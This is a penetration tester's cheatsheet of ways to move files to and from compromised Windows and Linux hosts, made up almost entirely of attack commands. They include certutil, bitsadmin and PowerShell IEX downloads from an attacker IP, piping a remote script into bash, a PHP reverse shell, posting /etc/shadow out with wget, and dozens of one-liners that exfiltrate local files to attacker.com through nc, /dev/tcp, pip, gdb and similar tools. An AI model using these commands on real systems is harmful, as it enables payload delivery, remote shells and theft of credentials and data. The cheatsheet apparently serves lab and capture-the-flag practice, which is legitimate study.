Ultimate - File Transfer Cheatsheet

File Transfer

What is this ?

This is my cheatsheet to transfer files to and from target machines which are Windows or Linux hosts. This is divided into two sections : -

  • Windows
  • Linux

In each section I have listed which are the main techniques that will allow you to easily transfer files. The last part in each of the section above is named as Others which will show some more tricks in a system that is very hardened it might be useful. I haven’t had to use any of those yet on all the machines that I have solved however if need arises its something you could try.

Windows

Bitsadmin

bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file

Certutil

certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file

debug.exe

The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. We’re able to take binaries like netcat ~ nc.exe and disassemeble them into hex. A series of non-interactive echo commands will write out the binary file into its hex representation. We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.

On Kali : upx -9 nc.exe

This is close to our limit. We can use upx ~ (executable packer) to compress it further:

The file size is now more suitable for transfer and has been decreased in size by almost 50%. We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe

cp /usr/share/windows-binaries/exe2bat.exe . Copy exe2bat to current working directory.

wine exe2bat.exe nc.exe nc.txt

This will produce a nc.txt file we can simply copy paste into the remote windows shell, and nc.exe will be automatically created on the compromised host.

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve the file on Kali : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Windows box to transfer file to C:\file : C:\path\to\openssl.exe s_client -quiet-connect AttackerIP:1234 > C:\file

PowerShell

Within PowerShell

  • Invoke-WebRequest -Uri "http:/AttackerIP/file" -OutFile "C:\path\to\file"
  • (New-Object Net.WebClient).downloadFile('http://10.10.14.45/shell.bat', 'C:\Users\Public\Downloads\shell.bat')

Outside PowerShell

powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')

Non-Interactive PowerShell script

1
2
3
4
5
6
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://AttackerIP/file" >>wget.ps1
echo $file = "file" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive NoProfile -File wget.ps1

IWR “http://yourip/shell.exe” -OutFile “shell.exe” , use this incase of transferring files from HTTP.

SMB

  • SMBserver.py

On Kali : python smbserver.py transfer_share /root/shells/shell.exe

On Target Windows :

// We can then check that our SMB share is up and running from our compromised Windows host

net view \\AttackerIP

// Windows commands like dir and copy can also be used

dir \\AttackerIP\transfer_share
copy \\AttackerIP\transfer_share\shell.exe

//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share

C:> \\AttackerIP\transfer_share\shell.exe

  • Impacket-SMBServer

On Kali : impacket-smbserver ShareName SharePath

On Windows (Powershell) : New-PSDrive -Name ShareName -PSProvider "FileSystem" -Root "\\Kali-IP\\ShareName"

If have to be done natively this can be used : net usershare add test /mount '' 'Everyone:F' guest_ok=y probably mount this on a docker container share.

TFTP

tftp -i AttackerIP get file

On Kali : apt-get install python-pyftpdlib && python -m pyftpdlib -p 21

With the server up and running, we can transfer files interactively or non-interactively:

  • Interactively :
1
2
3
4
5
6
7
8
//Interactive
C:> ftp AttackerIP
Connected to AttackerIP
User: anonymous
Password: anonymous
...
ftp> binary
ftp> get shell.exe
  • Non-Interactive :
    1
    2
    3
    4
    5
    6
    7
    8
    //Non-Interactive
    C:> echo open AttackerIP > c:\ftp.txt
    C:> echo anonymous >> c:\ftp.txt
    C:> echo anonymous >> c:\ftp.txt
    C:> echo binary >> c:\ftp.txt
    C:> echo get shell.exe >> c:\ftp.txt
    C:> echo bye >> c:\ftp.txt
    C:> ftp -s:C:\ftp.txt

Visual Basic Script (VBS)

  • Option 1 :
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    // Paste each line seperately into Windows shell
    echo strUrl = WScript.Arguments.Item(0) > wget.vbs
    echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
    echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
    echo Err.Clear >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
    echo http.Open "GET", strURL, False >> wget.vbs
    echo http.Send >> wget.vbs
    echo varByteArray = http.ResponseBody >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
    echo strData = "" >> wget.vbs
    echo strBuffer = "" >> wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
    echo Next >> wget.vbs
    echo ts.Close >> wget.vbs

cscript wget.vbs http://AttackerIP/file file

  • Option 2 :
    echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs

cscript transfer.vbs

Others

  • bitsadmin.exe
    Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
    bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

Privileges required : User

  • certutil.exe
    Download and save 7zip to disk in the current folder.
    certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Privileges required : User

Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Privileges required : User

  • desktopimgdownldr.exe

Download
Downloads the file and sets it as the computer’s lockscreen
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Usecase : Download arbitrary files from a web server

  • Esentutl.exe

Download : Copies the source EXE to the destination EXE file
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Usecase : Use to copy files from one unc path to another

  • Expand.exe

Download : Copies source file to destination.
expand \\webdav\folder\file.bat c:\ADS\file.bat
Usecase:Use to copies the source file to the destination file

  • Extrac32.exe

Download
Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \webdavserver\share\test.txt C:\folder\test.txt
Usecase:Download file from UNC/WEBDav

  • Findstr.exe

Download
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Usecase : Download/Copy file from webdav server

  • Ftp.exe

Download
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Usecase : Spawn new process using ftp.exe. Ftp.exe downloads the binary.

  • GfxDownloadWrapper.exe

Download
GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by “Microsoft Windows Hardware”, “Compatibility Publisher”, “Microsoft Windows Third Party Component CA 2012”, “Microsoft Time-Stamp PCA 2010”, “Microsoft Time-Stamp Service”.
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Usecase : Download file from internet

  • Hh.exe

Download
Open the target PowerShell script with HTML Help.
HH.exe http://some.url/script.ps1
Usecase : Download files from url

  • Ieexec.exe

Download
Downloads and executes bypass.exe from the remote server.
ieexec.exe http://x.x.x.x:8080/bypass.exe
Usecase : Download and run attacker code from remote location

  • Makecab.exe

Download
Download and compresses the target file and stores it in the target file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Usecase : Download file and compress into a cab file

  • Replace.exe

Download
Download/Copy bar.exe to outdir
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Usecase : Download file

  • Excel.exe

Download
Downloads payload from remote server
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase:It will download a remote payload and place it in the cache folder

  • Powerpnt.exe

Download
Downloads payload from remote server
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

  • Squirrel.exe

Download
The above binary will go to url and look for RELEASES file and download the nuget package.
squirrel.exe --download [url to package]
Usecase : Download binary

  • Update.exe

Download
The above binary will go to url and look for RELEASES file and download the nuget package.
Update.exe --download [url to package]
Usecase : Download binary

  • Winword.exe

Download
Downloads payload from remote server
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

  • Wsl.exe

Download
Downloads file from 192.168.1.10
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Usecase : Download file


Linux

Bash

cat backup.7z > /dev/tcp/10.10.14.3/9001

curl

1
2
3
4
5
6
7
8
9
10
11
curl http://AttackerIP/file --output /var/tmp/file

curl AttackerIP/linenum.sh | bash

# upload to SMB server

<?php
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.48/1234 0>&1’”);
phpinfo();
?>

fetch (freeBSD)

fetch -o /var/tmp/file "http://AttackerIP/file"

netcat

nc -nlvp 1234 < file

cat file | nc AttackerIP 1234

Transfering files with progress in nc :

On Server Side : cat backup.iso | pv -b | nc -l 3333

On Client Side : nc 192.168.0.1 3333 | pv -b > backup.iso

Preferably run it on our side because we will have the required dependency nc -lvp 1235 | pv -b > file

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve file (on Kali) : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Linux host to GET the file : openssl s_client -quiet-connect AttackerIP:1234 > file

Python

1
2
3
4
5
6
7
#!/usr/bin/python 
import urllib2

u = urllib2.urlopen('http://AttackerIP/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()

chmod +x download.py

python download.py

rsync

  • Download Folder : rsync -r rsync://user@ip/<remote_dir>/ .
  • Upload Folder : rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"

SCP

  • To download file from remote system (remote -> local) : scp user@remote_host:remote_file local_file
  • To upload file to remote server (local -> remote): scp local_file user@remote_host:remote_file

socat

socat TCP4-LISTEN:8000,fork file:<file to transfer> // server
socat TCP4:<ip>:8000 file:<file to get>,create // client

wget

wget http://AttackerIP/file -o /var/tmp/file
sudo wget --post-file=/etc/shadow 10.10.10.142

Others

  • bash

1.1

1
2
3
4
5
6
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

1.2

1
2
3
4
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  • cpan
URL
1
2
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
  • Curl

  • File upload
    It can exfiltrate files on the network.
    Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the @ to send hard-coded data.

1
2
3
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL

File download
It can download remote files.

Fetch a remote file via HTTP GET request.

1
2
3
URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
  • Easy Install

File Upload
It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    1
    2
    3
    4
    5
    6
    7
    8
    export URL=http://attacker.com/
    export LFILE=file_to_send
    TF=$(mktemp -d)
    echo 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
    easy_install $TF
  • Serve files in the local folder running an HTTP server.

    1
    2
    3
    4
    5
    6
    7
    export LPORT=8888
    TF=$(mktemp -d)
    echo 'import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
    easy_install $TF

File Download
It can download remote files. Fetch a remote file via HTTP GET request. The file path must be absolute.

1
2
3
4
5
6
7
8
9
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
pip install $TF
  • Finger

File Upload : It can exfiltrate files on the network.

Send a binary file to a TCP port. Run sudo nc -l -p 79 | base64 -d > “file_to_save” on the attacker box to collect the file. The file length is limited by the maximum size of arguments.

1
2
3
RHOST=attacker.com
LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST"

File Download
It can download remote files. Fetch remote binary file from a remote TCP port. Run base64 “file_to_send” | sudo nc -l -p 79 on the attacker box to send the file.

1
2
3
RHOST=attacker.com
LFILE=file_to_save
finger x@$RHOST | base64 -d > "$LFILE"
  • ftp

File Upload.
It can exfiltrate files on the network. Send local file to a FTP server.

1
2
3
RHOST=attacker.com
ftp $RHOST
put file_to_send

File Download
It can download remote files. Fetch a remote file from a FTP server.

1
2
3
RHOST=attacker.com
ftp $RHOST
get file_to_get
  • GDB

File upload

It can exfiltrate files on the network.

  • This requires that GDB is compiled with Python support. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    1
    2
    3
    4
    5
    6
    export URL=http://attacker.com/
    export LFILE=file_to_send
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' -ex quit
  • This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.

    1
    2
    3
    4
    5
    export LPORT=8888
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit

File Download

It can download remote files.
This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.

1
2
3
4
5
6
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' -ex quit
  • GIMP

File upload : It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    1
    2
    3
    4
    5
    6
    export URL=http://attacker.com/
    export LFILE=file_to_send
    gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'

Serve files in the local folder running an HTTP server.

1
2
3
4
5
export LPORT=8888
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

1
2
3
4
5
6
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'
  • IRB

File upload : It can exfiltrate files on the network. Serve files in the local folder running an HTTP server on port 8888.

1
2
irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

1
2
3
4
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
irb
require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])
  • JJS

File download : It can download remote files. Fetch a remote file via HTTP GET request.

1
2
3
4
5
6
7
8
9
10
11
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
echo "var URL = Java.type('java.net.URL');
var ws = new URL('$URL');
var Channels = Java.type('java.nio.channels.Channels');
var rbc = Channels.newChannel(ws.openStream());
var FileOutputStream = Java.type('java.io.FileOutputStream');
var fos = new FileOutputStream('$LFILE');
fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
fos.close();
rbc.close();" | jjs
  • jrunscript

File download : It can download remote files. Fetch a remote file via HTTP GET request.

1
2
3
URL=http://attacker.com/file_to_get
LFILE=file_to_save
jrunscript -e "cp('$URL','$LFILE')"
  • ksh

File upload : It can exfiltrate files on the network.

  • Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
    1
    2
    3
    4
    export RHOST=attacker.com
    export RPORT=12345
    export LFILE=file_to_send
    ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
  • Send local file using a TCP connection. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
    1
    2
    3
    4
    export RHOST=attacker.com
    export RPORT=12345
    export LFILE=file_to_send
    ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'

File download : It can download remote files. Fetch a remote file via HTTP GET request.

1
2
3
4
5
6
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Fetch remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box to send the file.

1
2
3
4
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  • LUA

File upload : It can exfiltrate files on the network.
Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.

1
2
3
4
5
6
7
8
9
10
11
12
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
loc0al s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.

1
2
3
4
5
6
7
8
9
10
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
  • LWP-download

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file. This requires lua-socket installed.

1
2
3
4
5
6
7
8
9
10
11
12
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download ; It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.

1
2
3
4
5
6
7
8
9
10
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
  • nc

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.

1
2
3
4
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"

File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.

1
2
3
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
  • nmap

File upload : It can exfiltrate files on the network.

- Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork` - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.

1
2
3
4
RHOST=attacker.com
RPORT=8080
LFILE=file_to_send
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
  • Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
1
2
3
4
5
6
7
8
9
10
11
12
13
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
nmap --script=$TF

File download : It can download remote files.

  • Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., php -S 0.0.0.0:8080. Note that multiple connections are made to the server and the result is placed in $TF/IP/PORT/PATH. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
1
2
3
4
5
RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE
  • Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.
1
2
3
4
5
6
7
8
9
10
11
12
export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF
  • openssl

File upload : It can exfiltrate files on the network. To collect the file run the following on the attacker box:

1
2
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save

Send a local file via TCP. Transmission will be encrypted.

1
2
3
4
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

File download
It can download remote files. To send the file run the following on the attacker box:

1
2
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send

Fetch a file from a TCP port, transmission will be encrypted.

1
2
3
4
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
  • php

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.

1
2
3
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT

File download. It can download remote files. Fetch a remote file via HTTP GET request.

1
2
3
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
  • pip

File upload.

It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6
7
8
export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
pip install $TF
  • Serve files in the local folder running an HTTP server.
1
2
3
4
5
6
7
export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF

File download.

It can download remote files.
Fetch a remote file via HTTP GET request. It needs an absolute local file path.

1
2
3
4
5
6
7
8
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' > $TF/setup.py
pip install $TF
  • python

File upload.

It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    1
    2
    3
    4
    5
    6
    export URL=http://attacker.com/
    export LFILE=file_to_send
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
  • Serve files in the local folder running an HTTP server.

    1
    2
    3
    4
    5
    export LPORT=8888
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'

File download.

It can download remote files.

  • Fetch a remote file via HTTP GET request.

    1
    2
    3
    4
    5
    6
    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])'
  • Ruby

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.

1
2
export LPORT=8888
ruby -run -e httpd . -p $LPORT

File download. It can download remote files.

Fetch a remote file via HTTP GET request.

1
2
3
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'
  • rvim

File upload. It can exfiltrate files on the network.

- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

1
2
3
4
5
6
7
export URL=http://attacker.com/
export LFILE=file_to_send
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
1
2
3
4
5
6
export LPORT=8888
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
- Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"`on the attacker box to collect the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.
1
2
3
4
5
6
7
8
9
10
11
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
rvim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download.

It can download remote files.

  • This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.

    1
    2
    3
    4
    5
    6
    7
    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    rvim -c ':py import vim,sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
